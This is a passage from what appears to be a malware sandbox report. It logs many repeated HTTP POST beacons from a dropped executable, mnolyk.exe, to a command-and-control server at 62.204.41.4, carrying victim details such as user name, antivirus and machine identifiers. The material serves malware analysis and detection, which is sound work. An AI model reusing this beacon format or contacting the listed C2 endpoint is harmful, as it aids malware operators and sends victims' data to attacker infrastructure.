                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:07.542187929 CET720INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        52192.168.2.54974262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:53.631836891 CET253OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:53.694607973 CET253INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        520192.168.2.55021062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:07.790071011 CET720OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:07.856143951 CET721INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        521192.168.2.55021162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:08.508471012 CET721OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:08.577630997 CET722INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        522192.168.2.55021262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:08.785161972 CET722OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:08.850505114 CET723INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        523192.168.2.55021362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:10.017712116 CET723OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:10.085311890 CET724INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        524192.168.2.55021462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:10.427527905 CET724OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:10.492854118 CET724INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        525192.168.2.55021562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:10.669292927 CET725OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:10.734399080 CET725INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        526192.168.2.55021662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:10.901300907 CET726OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:10.965966940 CET726INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        527192.168.2.55021762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:11.137962103 CET727OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:11.204516888 CET727INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        528192.168.2.55021862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:11.381608963 CET728OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:11.446054935 CET728INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        529192.168.2.55021962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:11.621916056 CET729OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:11.687207937 CET729INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        53192.168.2.54974362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:53.921247005 CET254OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:53.985326052 CET254INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        530192.168.2.55022062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:11.858797073 CET730OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:11.924299955 CET730INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        531192.168.2.55022162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:12.104837894 CET731OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:12.170964956 CET731INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        532192.168.2.55022262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:12.337101936 CET732OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:12.400702000 CET732INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        533192.168.2.55022362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:12.572504044 CET733OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:12.636516094 CET733INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        534192.168.2.55022462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:12.834481955 CET734OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:12.900197983 CET734INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        535192.168.2.55022562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:13.073060989 CET735OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:13.140642881 CET735INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        536192.168.2.55022662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:13.307960033 CET736OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:13.373641014 CET736INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        537192.168.2.55022762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:13.545015097 CET737OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
